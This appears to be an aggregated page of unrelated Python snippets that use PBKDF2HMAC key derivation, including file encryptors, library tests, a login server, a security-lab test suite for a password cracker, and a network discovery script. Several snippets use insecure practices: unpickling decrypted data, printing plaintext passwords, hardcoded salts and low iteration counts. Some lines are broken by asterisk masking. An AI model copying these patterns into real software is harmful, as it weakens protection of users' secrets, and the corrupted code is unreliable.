Esempio n. 1
0
def unpack_data(file_name, private_key_path=None, key_password=None):

    print(Fore.LIGHTMAGENTA_EX + "\n\n# ------------------------------------------------------\n"
          "# Warning the extractor module is not secure against erroneous or\n"
          "# maliciously constructed data. Never unpack data received from an\n"
          "# untrusted or unauthenticated source.\n"
          "# ------------------------------------------------------\n\n")

    enc_key = base64.b85decode(get_key_data("PRIVATE", private_key_path))
    if key_password:
        password = key_password
    else:
        password = getpass.getpass("Insert the key's password: "******"Decryption failed - Check if the key's password is correct: \n" + str(e))
        exit(668)

    private_key = serialization.load_pem_private_key(
        dec_key,
        password=None,
        backend=default_backend()
    )

    if not private_key:
        print(Fore.RED + "Could not load the public key")
        exit(667)

    with open(file_name,"rb") as file:
        encrypted = file.read()

        hmac_hash = encrypted[-64:]
        encrypted_password = (encrypted[:-64])[-1024:]

        key_password = private_key.decrypt(
            encrypted_password,
            ass_padding.OAEP(
                mgf=ass_padding.MGF1(algorithm=hashes.SHA512()),
                algorithm=hashes.SHA512(),
                label=None
            )
        )

        cipher_text = encrypted[:-1088]

        digest = hashes.Hash(hashes.SHAKE128(16), backend=default_backend())
        digest.update(key_password)
        salt = digest.finalize()

        # Real key digested from the key_password
        kdf_kp = PBKDF2HMAC(algorithm = hashes.SHA512(),
                         length = 32,
                         salt = salt,
                         iterations = 1000,
                         backend = default_backend())

        key = kdf_kp.derive(key_password)


        # ChaCha20 Nonce
        kdf_n = PBKDF2HMAC(algorithm = hashes.SHA256(),
                         length = 16,
                         salt = salt,
                         iterations = 200,
                         backend = default_backend())

        nonce = kdf_n.derive(key)

        # AES CBC Init vector
        kdf_iv = PBKDF2HMAC(algorithm=hashes.SHA256(),
                         length=16,
                         salt=salt,
                         iterations=200,
                         backend=default_backend())

        iv = kdf_iv.derive(nonce + key)

        # HMAC Derivated key
        kdf_hmac = PBKDF2HMAC(algorithm=hashes.SHA256(),
                         length=32,
                         salt=salt,
                         iterations=200,
                         backend=default_backend())

        hmac_key = kdf_hmac.derive(iv + key)

        try:
            h = hmac.HMAC(hmac_key, hashes.SHA512(), backend=default_backend())
            h.update(cipher_text)
            h.verify(hmac_hash)
        except:
            print(Fore.RED + "Could not authenticate data pack")
            exit(667)

        print(Fore.GREEN + "Valid data")

        # AES
        cipher_aes = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
        decryptor = cipher_aes.decryptor()
        chacha_encrypted = decryptor.update(cipher_text) + decryptor.finalize()

        # CHACHA
        chacha_alg = algorithms.ChaCha20(key, nonce)
        cipher_chacha = Cipher(chacha_alg, mode=None, backend=default_backend())
        decryptor = cipher_chacha.decryptor()
        compressed_padded = decryptor.update(chacha_encrypted)

        # PKCS7 padding
        unpadder = padding.PKCS7(256).unpadder()
        data = unpadder.update(compressed_padded)
        compressed = data + unpadder.finalize()
        ## =====


        try:
            data = lzma.decompress(compressed)
        except Exception as e:
            var = traceback.format_exc()
            raise Exception("Decompress A {} \n {}".format(str(var), str(e)))

    print("Done!")
    ret_data = b""
    try:
        ret_data = pickle.loads(data)
    except Exception as e:
        print(Fore.RED + "Error while unserializing")
        var = traceback.format_exc()
        raise Exception("Unpack Serial {} \n {}".format(str(var), str(e)))

    return ret_data
 def test_unicode_error_with_key_material(self, backend):
     kdf = PBKDF2HMAC(hashes.SHA1(), 20, b"salt", 10, backend)
     with pytest.raises(TypeError):
         kdf.derive(u"unicode here")
def test_invalid_backend():
    pretend_backend = object()

    with raises_unsupported_algorithm(_Reasons.BACKEND_MISSING_INTERFACE):
        PBKDF2HMAC(hashes.SHA1(), 20, b"salt", 10, pretend_backend)
Esempio n. 4
0
def innerEnc(input, kli):
    global d, co, innerkeyli, nu
    innerkeyli = []
    mylines = []
    c = -1

    fk = open("KeyFile.txt", 'a+')

    with open(input, 'r+') as myfile:
        for myline in myfile:  # For each line, stored as myline,
            mylines.append(myline)
    myfile.close()

    for i in mylines:
        c = c + 1
        if i.find("1)") == 0:
            co = c
            break
    # print(c)
    lk = len(kli)
    # print(lk)

    myfile = open(input, "r+")
    r = myfile.readlines()

    rl = []
    i = 0
    j = 0
    m = 0
    lin = -1

    modulo(input)
    output = oli[nu - 1]

    f = open(output, "w+")

    for x in r:
        # print(x)
        lin = lin + 1
        if lin == (c + j):
            if j == 2:
                rl.append(x)
                j = j + 1
            else:
                # print("val of i:",i)
                # print("current key:" + kli[i])
                password_en = kli[i].encode()  # Convert to type bytes
                salt = os.urandom(16)

                kdf = PBKDF2HMAC(algorithm=hashes.SHA256(),
                                 length=32,
                                 salt=salt,
                                 iterations=100000,
                                 backend=default_backend())

                key = base64.urlsafe_b64encode(
                    kdf.derive(password_en))  # Can only use kdf once
                innerkeyli.append(key)
                fk.write(key.decode())
                fk.write(",")
                fernet = Fernet(key)
                # print("value of j=", j)
                data = x.encode()
                encrypted = fernet.encrypt(data)
                enc = encrypted.decode()
                rl.append(enc + '\n')
                j = j + 1

            if j == 4:
                c = c + 5
                j = 0
                i = i + 1

            if (i >= lk):
                # d = d + 1
                break

        else:
            rl.append(x)

    f.writelines(rl)
    fk.write("\n")
    f.close()
    fk.close()
 def test_unsupported_algorithm(self, backend):
     with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_HASH):
         PBKDF2HMAC(DummyHashAlgorithm(), 20, b"salt", 10, backend)
Esempio n. 6
0
def PBKDF2(password, salt):
	kdf = PBKDF2HMAC(algorithm=hashes.SHA256(),length=32,salt=salt,iterations=100000,backend=default_backend())
	key = kdf.derive(password)
	return key
Esempio n. 7
0
    def init_cryptors(self, password):
        """
        Initialize the cryptors according to the given sec_mode

        This function must be called before
        trying to encrypt/decrypt anything.

        Parameters
        ----------
        password : string or bytes
        """
        password = self.to_bytes(password)

        kdfs = [None for i in range(self.CRYPTOR_NUM)]
        KEYS_SIZE = self.KEY_SIZE * self.CRYPTOR_NUM

        if self.SEC_MODE == '0':
            nacl_ops = pwhash.argon2i.OPSLIMIT_INTERACTIVE
            nacl_mem = pwhash.argon2i.MEMLIMIT_INTERACTIVE
            gost_iters = 4
            crypt_iters = 60000
        elif self.SEC_MODE == '1':
            nacl_ops = pwhash.argon2i.OPSLIMIT_MODERATE
            nacl_mem = pwhash.argon2i.MEMLIMIT_MODERATE
            gost_iters = 24
            crypt_iters = 500000
        elif self.SEC_MODE == '2':
            nacl_ops = pwhash.argon2i.OPSLIMIT_SENSITIVE
            nacl_mem = pwhash.argon2i.MEMLIMIT_SENSITIVE
            gost_iters = 111
            crypt_iters = 2500000
        else:
            raise TypeError("Wrong SEC_MODE!")

        kdfs[0] = lambda pw: pwhash.argon2i.kdf(KEYS_SIZE,
                                                pw,
                                                self.salts[0][:pwhash.argon2i.
                                                              SALTBYTES],
                                                opslimit=nacl_ops,
                                                memlimit=nacl_mem)

        kdfs[1] = lambda pw: pbkdf2(pw, self.salts[1], gost_iters, KEYS_SIZE)

        kdfs[2] = lambda pw: PBKDF2HMAC(algorithm=hashes.SHA256(),
                                        length=KEYS_SIZE,
                                        salt=self.salts[2],
                                        iterations=crypt_iters,
                                        backend=default_backend()).derive(pw)

        long_key = password
        for i in range(self.CRYPTOR_NUM):
            long_key = kdfs[i](long_key)

        keys = [
            long_key[self.KEY_SIZE * i:self.KEY_SIZE * (i + 1)]
            for i in range(self.CRYPTOR_NUM)
        ]

        self.cryptors[0] = Fernet(base64.urlsafe_b64encode(keys[2]))
        self.cryptors[1] = GOST_Cryptor(keys[1])
        self.cryptors[2] = secret.SecretBox(keys[0])
Esempio n. 8
0
    def post(self, request, eid, tok, format=None):
        # Verify that the employee ID exists
        tokR = settings.REDIS_CONN.get(eid)
        if tokR is None:
            return Response(False)
        #  TokR is not None
        if not isinstance(tokR, bytes):
            return Response(False)

        # TokR is a bytes buffer
        if tokR.decode('utf-8') == tok:
            request = loads(request.body)
            salt = b64decode(tok)
            EncData = b64decode(request['data'])

            loaded_public_key = serialization.load_pem_public_key(
                b64decode(request['pub']), backend=default_backend())

            loaded_private_key = serialization.load_pem_private_key(
                b64decode(settings.REDIS_CONN.get(eid + "pvt")),
                # or password=None, if in plain text
                password=None,
                backend=default_backend())

            shared_key = loaded_private_key.exchange(ec.ECDH(),
                                                     loaded_public_key)

            kdf = PBKDF2HMAC(algorithm=hashes.SHA256(),
                             length=32,
                             salt=salt,
                             iterations=100000,
                             backend=default_backend())

            AESkey = kdf.derive(shared_key)

            DecData = self.DecAES(AESkey, EncData)
            DecDataJSON = loads(DecData)
            OTP = DecDataJSON['OTP']
            if HCenterEmployee.objects.filter(EmployeeID=eid).exists():
                EmpObj = HCenterEmployee.objects.get(EmployeeID=eid)
                # Generate a Session Token for Employee and return it
                # Hash a random number
                config.InputTemplate['uid'] = EmpObj.Data['UID']
                config.InputTemplate["bio_dict"]["FMR"] = {
                    "LEFT_THUMB": DecDataJSON["BIO"]
                }
                res = AuthInit(config.InputTemplate, OTP)
                if res.get('actn') == "RETRY":
                    res = AuthInit(config.InputTemplate, OTP)
                if res.get('ret') == "Y":
                    # Employee Verification complete
                    # In redis save EID + "auth" = Txn ID of AuthInit response
                    settings.REDIS_CONN.set(eid + "auth", res.get('txn'),
                                            10 * 3600)  # Valid for 10 hours.
                    # Create a new token Encrypt it with the AESkey and return in response a newcreated Token
                    # From this point on after recieving this token HealthCenter will request Sessions from Auth Channel
                    # from Session Server
                    tok = sha256(urandom(128)).hexdigest()
                    settings.REDIS_CONN.set(
                        eid + "authed", tok,
                        3600)  # One Token is valid for One Hour.
                    return Response(tok)
                else:
                    return Response(False)
        return Response(False)
Esempio n. 9
0
    def secret_do(self, file_p, key_p="ldae_is_good", secret_if=1):

        burst_if = 0
        password = bytes(key_p, encoding="utf-8")
        salt = b"llddaaeeiissookk"
        kdf = PBKDF2HMAC(algorithm=hashes.SHA256(),
                         length=32,
                         salt=salt,
                         iterations=100000,
                         backend=default_backend())
        #kdf = PBKDF2HMAC(algorithm=hashes.SHA224,length=32,salt=b"123",iterations=100000,backend=default_backend())
        jey = base64.urlsafe_b64encode(kdf.derive(password))
        key = Fernet(jey)
        #文件操作实例
        file_do = inc_file.File_base()

        file_size = file_do.getDocSize(file_p)
        print("\n文件大小:" + file_size)
        print("(file_sizes:" + file_size + ")\n")

        #超过系统内存某阈值值分片
        mem = psutil.virtual_memory()
        numb_mem_free = float(mem.total)
        numb_mem_free = numb_mem_free / 1024 / 1024 / 1024 / 8  #可占用内存估计阈值

        if ("G" in file_size):
            numb_size = float(file_size.replace(" G", ""))
            if (numb_size > numb_mem_free):
                burst_if = 1
        if ("M" in file_size):
            numb_size = float(file_size.replace(" M", ""))
            if (numb_size > numb_mem_free * 1024):
                burst_if = 1

        # 加密处理
        if secret_if == 1:

            # ----- 分片处理开始 -----
            if (burst_if > 0):

                print("\n文件大于 " + str(int(numb_mem_free)) + "G,进行分片处理......")
                print(
                    "(Sizes of file is more than 512M,so it is burstting......)\n"
                )

                f = open(key_p + ".txt", 'a', encoding="utf-8")

                try:

                    t = open(file_p, 'r', encoding="utf-8")

                except:

                    t = open(file_p, 'r')

                for line in t:

                    str_t = line
                    str_t = str_t.encode("utf-8")
                    token = key.encrypt(str_t)  # 加密
                    f.write(str(token) + "\r\n")

                f.close()
                t.close()

                os.remove(file_p)
                os.rename(key_p + ".txt", file_p)

                return True

            # ----- 分片处理结束 -----

            # ----- 非分片处理开始 -----
            if (burst_if == 0):

                try:

                    t = open(file_p, 'r', encoding="utf-8")
                    text = t.read()
                    text = text.encode("utf-8")
                    t.close()

                except:

                    t = open(file_p, 'r')
                    text = t.read()
                    text = text.encode("utf-8")
                    t.close()

                try:

                    token = key.encrypt(text)  # 加密
                    #print(token) # 调试用

                    f = open(file_p, 'wb')
                    f.write(token)
                    f.close()
                    return True

                except:

                    print("\nThe running is bad!Try it again,please!\n")
                    return False
                    pass

            # ----- 非分片处理结束

            return True

        # 解密处理
        if secret_if == 2:

            # ----- 分片解密开始 -----
            if (burst_if == 1):

                print("\n文件大于512M,进行分片处理......")
                print(
                    "(Sizes of file is more than 512M,so it is burstting......)\n"
                )

                f = open(key_p + ".txt", 'w')
                t = open(file_p, 'r', encoding="utf-8")

                for line in t:

                    if (line != "\n"):
                        line = line.replace("b'", "")
                        line = line.replace("'", "")
                        line = line.replace("\n", "")
                        byte_t = line.encode("utf-8")
                        #print (byte_t) #调试用
                        try:
                            source_str = key.decrypt(byte_t)
                            source_str = source_str.decode("utf-8")  # 解密
                            f.write(source_str)
                        except:
                            pass
                f.close()
                t.close()

                os.remove(file_p)
                os.rename(key_p + ".txt", file_p)

                return True

            # ----- 分片解密结束 -----

            # ----- 非分片解密开始 -----
            if (burst_if == 0):

                text = open(file_p, 'rb').read()
                if (text[0:5] != b"gAAAA"):

                    print("\n源文件不是加密文件,请再试一次!")
                    print(
                        "The file is not a Secret file!Try it again,please!\n")
                    return False
                try:

                    source_str = key.decrypt(text)
                    source_str = source_str.decode("utf-8")  # 解密

                except:

                    print("\n密钥错误,请再试一次!")
                    print("The key is wrong!Try it again,please!\n")
                    return False

                try:

                    f = open(file_p, 'w', encoding="utf-8")
                    f.write(source_str)
                    f.close()
                    return True

                except:

                    f = open(file_p, 'w')
                    f.write(source_str)
                    f.close()
                    return True

            # ----- 非分片解密结束 -----

            return True
Esempio n. 10
0
def get_profile_password(path, default=None):
    """
    Get a value from the profile, whether it exists or not
    If the value does not exist in the profile, returns
    either the default value (if there is one) or None.
    """
    _logger = logging.getLogger(__name__)
    allowed = []
    allowed.append(
        os.path.join(os.path.dirname(os.path.abspath(__file__)),
                     'app_utils.py'))
    allowed.append(
        os.path.join(os.path.dirname(os.path.abspath(__file__)),
                     'commandline.py'))
    allowed.append(
        os.path.join(os.path.dirname(os.path.abspath(__file__)),
                     'application.py'))
    filename = inspect.getframeinfo(sys._getframe(1))[0]
    if (filename in allowed):
        if (isinstance(path, str)):
            path = [path]
        first_id = hashlib.sha256(
            run_command("cat /etc/machine-id".split(),
                        capture=1).stdout).hexdigest()
        second_id = hashlib.sha256(
            run_command("hostid".split(), capture=1).stdout).hexdigest()
        try:
            third_idb1 = run_command("blkid".split(),
                                     capture=1).stdout.decode().strip()
            third_id = hashlib.sha256(
                run_command("""grep -oP 'UUID="\\K[^"]+'""".split(),
                            capture=4,
                            stdin=third_idb1).stdout).hexdigest()
        except FileNotFoundError:
            _logger.warning(" ".join([
                "Package not installed: 'blkid'",
                "Please install it manually or run apt_requirements.sh again"
            ]))
            third_id = ""
        salt = get_profile_key()
        kdf = PBKDF2HMAC(algorithm=hashes.SHA512(),
                         length=32,
                         salt=salt,
                         iterations=100000,
                         backend=default_backend())
        password = ''.join([first_id, second_id, third_id]).encode()
        key = base64.urlsafe_b64encode(kdf.derive(password))
        cipher_suite = Fernet(key)
        response = get_profile_var(path, None)
        try:
            if (hasattr(response, "encode")):
                response = cipher_suite.decrypt(
                    response.encode("utf-8")).decode("utf-8")
        except InvalidToken:
            response = None
        if response is None:
            response = default
    else:
        print(
            "Access to encrypted profile elements not allowed from {}".format(
                filename))
        _logger.warn(
            "Access to encrypted profile elements not allowed from {}".format(
                filename))
        response = None
    return response
Esempio n. 11
0
def login(conn, crsr, sqlconn):
    updateLoggedIn = 'UPDATE user_info SET LoggedIn = %s WHERE (Username = %s)'
    retreivePwordCommand = 'SELECT Pword FROM user_info WHERE (Username = %s)'
    storePkey = 'UPDATE user_info SET PublicKey = %s WHERE (Username = %s) '
    getSalt = 'SELECT Salt FROM user_info WHERE (Username = %s)'
    userExistCommand = 'SELECT COUNT(Username) FROM user_info WHERE (Username = %s)'

    sizeofuser = int.from_bytes(conn.recv(28), byteorder='big')
    user = conn.recv(sizeofuser)
    crsr.execute(userExistCommand, (user, ))
    ans = crsr.fetchall()

    while ans[0][0] == 0:
        conn.send((1).to_bytes(1, byteorder='big'))
        sizeofuser = int.from_bytes(conn.recv(28), byteorder='big')
        user = conn.recv(sizeofuser)
        crsr.execute(userExistCommand, (user, ))
        ans = crsr.fetchall()
    conn.send((0).to_bytes(1, byteorder='big'))

    sizeofpword = int.from_bytes(conn.recv(28), byteorder='big')
    pword = conn.recv(sizeofpword)

    crsr.execute(getSalt, (user.decode(), ))
    salt = (crsr.fetchall())[0][0]
    salt = bytes(salt)
    print('the salt returned is', salt, '\n')
    print('salt is a ', type(salt), '\n')
    crsr.execute(retreivePwordCommand, (user.decode(), ))
    ans = (crsr.fetchall())[0][0]
    ans = ans.encode()
    #print(ans)
    ans = bytes(ans)

    kdf = PBKDF2HMAC(algorithm=hashes.SHA256(),
                     length=32,
                     salt=salt,
                     iterations=100000,
                     backend=default_backend())
    key = base64.urlsafe_b64encode(kdf.derive(user))
    f = Fernet(key)
    ans = f.decrypt(ans)
    print('the actual password is ', ans, '\n')
    print('the password received is ', pword, '\n')
    while ans != pword:
        conn.send((1).to_bytes(1, byteorder='big'))
        sizeofpword = int.from_bytes(conn.recv(28), byteorder='big')
        pword = conn.recv(sizeofpword)
        print('the password received is ', pword, '\n')
    conn.send((0).to_bytes(1, byteorder='big'))
    sizeofpkey = int.from_bytes(conn.recv(28), byteorder='big')
    pkey = conn.recv(sizeofpkey)
    crsr.execute(storePkey, (
        pkey,
        user.decode(),
    ))
    crsr.execute(updateLoggedIn, (
        'ONLINE',
        user.decode(),
    ))
    sqlconn.commit()
    return user.decode()
Esempio n. 12
0
def do_crypto_stuff(password: str, given_salt: bytes, num_of_iterations: int) -> Fernet:
    encoded_password = password.encode('utf-8')
    kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=given_salt, iterations=num_of_iterations)
    key = base64.urlsafe_b64encode(kdf.derive(encoded_password))
    return Fernet(key)
Esempio n. 13
0
@app.on_event("shutdown")
async def close_session():
    conn_pool = app.state.redis
    await conn_pool
    await conn_pool.wait_closed()


connect(
    app=app,
    secret=secret_key,
    signer=Fernet(
        b64encode(
            PBKDF2HMAC(
                algorithm=hashes.SHA256(),
                length=32,
                salt=salt,
                iterations=100,
            ).derive(secret_key.encode("utf-8")))),
    settings=settings,
    backend_adapter_loader=on_load_backend_adapter,
    on_load_cookie=on_load_cookie,
)


@app.post("/init/")
async def init_session(
    response: Response, manager: SessionManager = Depends(get_session_manager)
) -> Response:
    response = manager.set_cookie(response, session_id_generator(app))
    response.status_code = status.HTTP_200_OK
    return response
Esempio n. 14
0
def create_symm_key(pwd):
    salt = b'\ x00'
    kdf = PBKDF2HMAC(hashes.SHA1(), 16, salt, 1000, default_backend())
    return kdf.derive(bytes(pwd, 'UTF-8'))
Esempio n. 15
0
    file.write(ciphertext)
print(plaintext, f.decrypt(ciphertext))

with open("details.txt", "rb") as file:
    token = file.read()
print(f.decrypt(token))

message = b"Secret message!"
password = b"password"
key1 = Fernet(Fernet.generate_key())
key2 = Fernet(Fernet.generate_key())
f = MultiFernet([key1, key2])

salt = os.urandom(16)
kdf = PBKDF2HMAC(algorithm=hashes.SHA256(),
                 length=32,
                 salt=salt,
                 iterations=390000)
key = base64.urlsafe_b64encode(kdf.derive(password))
f = Fernet(key)
print(salt)

token = f.encrypt(message)
print(token)
kdf = PBKDF2HMAC(algorithm=hashes.SHA256(),
                 length=32,
                 salt=salt,
                 iterations=390000)
key = base64.urlsafe_b64encode(kdf.derive(b"password"))
f = Fernet(key)
print(f.decrypt(token))
Esempio n. 16
0
 def _get_kdf(self, salt):
     return PBKDF2HMAC(algorithm=hashes.SHA256(),
                       length=32,
                       salt=salt,
                       iterations=100000,
                       backend=default_backend())
Esempio n. 17
0
    def test_db_cmdline(self):
        print("Testing the cracker.py commandline brute force test")
        print("cwd", os.getcwd())
        pw1 = random_word(string.ascii_lowercase, random.randint(2,4))
        pw2 = random_word(string.ascii_lowercase, random.randint(2,4))
        pw3 = random_word(string.ascii_lowercase, 6)
        self.assertTrue(os.path.exists("cracker.py"))
        self.assertTrue(os.path.exists("db.sqlite3"))
        
        pws = {pw1:True, pw2: True, pw3: False}
        for pw, should_pass in pws.items():
            salt = random_word(string.ascii_letters+string.digits, 12)
            kdf = PBKDF2HMAC(
                algorithm=hashes.SHA256(),
                length=16,
                salt=salt,
                iterations=1,
                )
            key_hash = kdf.derive(pw.encode())
            hash = "pbkdf2_sha256$1${}${}".format(salt, base64.b64encode(key_hash).decode()
            output = subprocess.check_output("python3 cracker.py {}".format(hash), shell=True)
            output = output.decode()
            output = output.lower()
            passed = False
            if "password not cracked" in output:
                passed = False
            if "password cracked" in output:
                passed = True
                self.assertTrue(output.count(":") == 1)
                password = output.split(":")[1].strip()
                self.assertTrue(password == pw or password[1:-1] == pw)
            self.assertEqual(should_pass, passed)
            
    def tearDown(self):
        if self.TEST_PATH in os.getcwd():
            os.chdir("..")
        if os.path.exists(self.TEST_PATH):
            os.system("rm -rf {}".format(self.TEST_PATH))
            

class ViewsTestCase(TestCase):
    def setUp(self):
        UserXtraAuth.objects.create(username="******", secrecy=5, tokenkey = "")
        UserXtraAuth.objects.create(username="******", secrecy=0, tokenkey = "")
        
        NewsListing.objects.create(queryId="abc", query="Top Secret", sources="", secrecy=5,lastuser="")
        NewsListing.objects.create(queryId="cde", query="Not Secret", sources="", secrecy=0,lastuser="")
        NewsListing.objects.create(queryId="bcd", query="Middle Secret", sources="", secrecy=3,lastuser="")
        
    def test_api_manager(self):
        print("Testing the no read up policy:")
        
        test_api = NewsApiManager()
        
        #0 secrecy api cannot read articles of higher secrecy level
        test_api.update_secrecy(0)
        test_api.update_articles()
        
        self.assertEqual(len(test_api.data), 1)
        
        #5 secrecy api can read articles of equal or higher secrecy level
        test_api.update_secrecy(5)
        test_api.update_articles()
        
        self.assertEqual(len(test_api.data), 3)
            
    
    def test_user_account(self):
        print("Testing that users can only see news items at their level when in the view to update or create news items.  Make sure you are not leaking data about other queries that the user is not supposed to see.")
        
        rookie = UserXtraAuth.objects.get(username="******")
        bigshot = UserXtraAuth.objects.get(username="******")
        
        #set up requests
        request_get = RequestFactory().get('/')
        
        data = {'create_news': 'news', 'new_news_query': 'new', 'new_news_sources': 'source', 'new_news_secrecy': 5}
        request_post_create = RequestFactory().post('/', data)
        
        data = {'update_update': 'news', 'update_news_query': 'new', 'update_news_sources': 'source', 'update_news_secrecy': 5, 'update_news_select' : NewsListing.objects.get(queryId="abc").id}
        request_post_update = RequestFactory().post('/', data)
        
        
        data = {'update_delete': 'news', 'update_news_select': NewsListing.objects.get(queryId="abc").id}
        request_post_delete = RequestFactory().post('/', data)
        
        #test bigshot get
        request_get.user = bigshot
        render = user_account(request_get)
        
        self.assertTrue(str(render.content).count("abc") == 1)
        self.assertTrue(str(render.content).count("bcd") == 0)
        self.assertTrue(str(render.content).count("cde") == 0)
        
        #test bigshot create
        request_post_create.user = bigshot
        render = user_account(request_post_create)
        
        self.assertTrue(str(render.content).count("abc") == 1)
        self.assertTrue(str(render.content).count("bcd") == 0)
        self.assertTrue(str(render.content).count("cde") == 0)
        
        
        #test bigshot delete
        request_post_delete.user = bigshot
        render = user_account(request_post_delete)
        
        self.assertTrue(str(render.content).count("abc") == 1)
        self.assertTrue(str(render.content).count("bcd") == 0)
        self.assertTrue(str(render.content).count("cde") == 0)
        
        
        #test bigshot update
        request_post_update.user = bigshot
        render = user_account(request_post_update)
        
        self.assertTrue(str(render.content).count("abc") == 1)
        self.assertTrue(str(render.content).count("bcd") == 0)
        self.assertTrue(str(render.content).count("cde") == 0)
        
        #test rookie get
        request_get.user = rookie
        render = user_account(request_get)
        
        self.assertTrue(str(render.content).count("abc") == 0)
        self.assertTrue(str(render.content).count("bcd") == 0)
        self.assertTrue(str(render.content).count("cde") == 1)
        
        #test rookie create
        request_post_create.user = rookie
        render = user_account(request_post_create)
        
        self.assertTrue(str(render.content).count("abc") == 0)
        self.assertTrue(str(render.content).count("bcd") == 0)
        self.assertTrue(str(render.content).count("cde") == 1)
        
        #test rookie delete
        request_post_delete.user = rookie
        render = user_account(request_post_delete)
        
        self.assertTrue(str(render.content).count("abc") == 0)
        self.assertTrue(str(render.content).count("bcd") == 0)
        self.assertTrue(str(render.content).count("cde") == 1)
        
        #test rookie update
        request_post_update.user = rookie
        render = user_account(request_post_update)
        
        self.assertTrue(str(render.content).count("abc") == 0)
        self.assertTrue(str(render.content).count("bcd") == 0)
        self.assertTrue(str(render.content).count("cde") == 1)
            
        
    def test_form_validation(self):
        print("Testing that BLP is followed on creation/update/delete of news item:")
        
        rookie = UserXtraAuth.objects.get(username="******")
        bigshot = UserXtraAuth.objects.get(username="******")
        
        #set up requests
        # create a unique source that can be used to search the db
        create_source_key = random_word(string.ascii_lowercase, 10)
        data = {'create_news': 'news', 'new_news_query': 'new', 'new_news_sources': create_source_key, 'new_news_secrecy': 3}
        request_post_create = RequestFactory().post('/', data)
        
        update_source_key_3 = random_word(string.ascii_lowercase, 10)
        data = {'update_update': 'news', 'update_news_query': 'new', 'update_news_sources': update_source_key_3, 'update_news_secrecy': 3, 'update_news_select' : NewsListing.objects.get(queryId="bcd").id}
        request_post_update_3 = RequestFactory().post('/', data)
        
        update_source_key_5 = random_word(string.ascii_lowercase, 10)
        data = {'update_update': 'news', 'update_news_query': 'new', 'update_news_sources': update_source_key_5, 'update_news_secrecy': 5, 'update_news_select' : NewsListing.objects.get(queryId="abc").id}
        request_post_update_5 = RequestFactory().post('/', data)
        
        update_source_key_5_to_3 = random_word(string.ascii_lowercase, 10)
        data = {'update_update': 'news', 'update_news_query': 'new', 'update_news_sources': update_source_key_5_to_3, 'update_news_secrecy': 3, 'update_news_select' : NewsListing.objects.get(queryId="abc").id}
        request_post_update_5_to_3 = RequestFactory().post('/', data)
        
        
        data = {'update_delete': 'news', 'update_news_select': NewsListing.objects.get(queryId="bcd").id}
        request_post_delete = RequestFactory().post('/', data)
        
        ######
        # WRITE TEST
        #  1. Write down (not allowed)
        #  2. Write up (allowed) 
        ####
        
        
        self.assertEqual(len(NewsListing.objects.filter(sources=create_source_key)), 0)
        request_post_create.user = bigshot
        user_account(request_post_create)
        # should not have added (5->3) is a write-down
        self.assertEqual(len(NewsListing.objects.filter(sources=create_source_key)), 0)
        request_post_create.user = rookie
        user_account(request_post_create)
        self.assertEqual(len(NewsListing.objects.filter(sources=create_source_key)), 1)
        
        
        
        ####
        # Update Test
        #   1. Attempt to update down (not allowed)
        #   2. Attempt to update same level (allowed)
        #   3. Attempt to update same level to lower level (not allowed)
        # 
        # Attempting to update up is also technically not 
        # allowed in this lab... but it's just weird enough
        # that we won't test it here. Satisfied to simply not
        # post any information (read up)
        
        # attempt to update at an item at a different security level (5->3)
        bcd = NewsListing.objects.get(queryId="bcd")
        self.assertFalse(bcd.sources == update_source_key_3)
        request_post_update_3.user = bigshot
        render = user_account(request_post_update_3)
        bcd = NewsListing.objects.get(queryId="bcd")
        self.assertFalse(bcd.sources == update_source_key_3)
        
        bcd = NewsListing.objects.get(queryId="abc")
        self.assertFalse(bcd.sources == update_source_key_5)
        request_post_update_5.user = bigshot
        render = user_account(request_post_update_5)
        bcd = NewsListing.objects.get(queryId="abc")
        self.assertTrue(bcd.sources == update_source_key_5)
        
        bcd = NewsListing.objects.get(queryId="abc")
        self.assertEqual(bcd.secrecy, 5)
        request_post_update_5_to_3.user = bigshot
        render = user_account(request_post_update_5_to_3)
        bcd = NewsListing.objects.get(queryId="abc")
        self.assertTrue(bcd.secrecy, 5)
            
        
        ####
        # DELETE TEST
        # 1. Attempt to delete a lower secrecy item (not allowed)
        # 2. Attempt to delete an item at the same level (allowed)
        ###
        # attempt to delete at a different security level (5->3) and fail
        
        self.assertEqual(len(NewsListing.objects.filter(queryId="bcd")), 1)
        request_post_delete.user = bigshot
        render = user_account(request_post_delete)
        self.assertEqual(len(NewsListing.objects.filter(queryId="bcd")), 1)
        
        NewsListing.objects.create(queryId="to_delete", query="Delete Secret", sources="", secrecy=5,lastuser="")
        
        data = {'update_delete': 'news', 'update_news_select': NewsListing.objects.get(queryId="to_delete").id}
        request_post_delete_ok = RequestFactory().post('/', data)
        
        self.assertEqual(len(NewsListing.objects.filter(queryId="to_delete")), 1)
        request_post_delete_ok.user = bigshot
        render = user_account(request_post_delete_ok)
        self.assertEqual(len(NewsListing.objects.filter(queryId="to_delete")), 0)
            
Esempio n. 18
0
def _derive_key(pin, salt):
    kdf = PBKDF2HMAC(hashes.SHA1(), 24, salt, 10000, default_backend())
    return kdf.derive(pin.encode('utf-8'))
Esempio n. 19
0
def discover(args):
    handle = args.handle
    token = args.token
    instance = args.instance

    host_list_file = args.remote_hosts_csv
    if host_list_file == None:
        host_list_file = args.host_list

    if host_list_file is not None:
        with open(host_list_file, mode='r') as csv_file:
            csv_reader = csv.DictReader(csv_file,
                                        quoting=csv.QUOTE_NONE,
                                        escapechar='\\')
            password = None
            remote_hosts = []
            for row in csv_reader:
                if not args.secure and row['userpwd'].startswith(
                        '__SECURE__:'):
                    if args.password is None:
                        if password is None:
                            password = getpass.getpass(
                                prompt="Enter password: "******"Failed to decrypt login details for " +
                                      row['hostname'])
                        return None
                elif row['userpwd'] != '' and not args.secure:
                    logging.warning(
                        'Unsecure login information in file. Use --secure to encrypt.'
                    )
                if '-' in row['hostname'] or '/' in row[
                        'hostname']:  # IP range or CIDR is specified, then expand it
                    if '-' in row['hostname']:
                        iprange = row['hostname']
                        iprange = iprange.replace(' ', '')
                        tokens = iprange.split('-')
                        if len(tokens) != 2 or len(tokens[0]) == 0 or len(
                                tokens[1]) == 0:
                            logging.error("Skipping invalid range [%s]",
                                          row['hostname'])
                            continue
                        logging.info(
                            "Enumerating IPs based on specified range [%s]",
                            iprange)
                        try:
                            if sys.version_info[0] < 3:
                                startip = ipaddress.IPv4Address(
                                    unicode(tokens[0]))
                                endip = ipaddress.IPv4Address(
                                    unicode(tokens[1]))
                            else:
                                startip = ipaddress.IPv4Address(tokens[0])
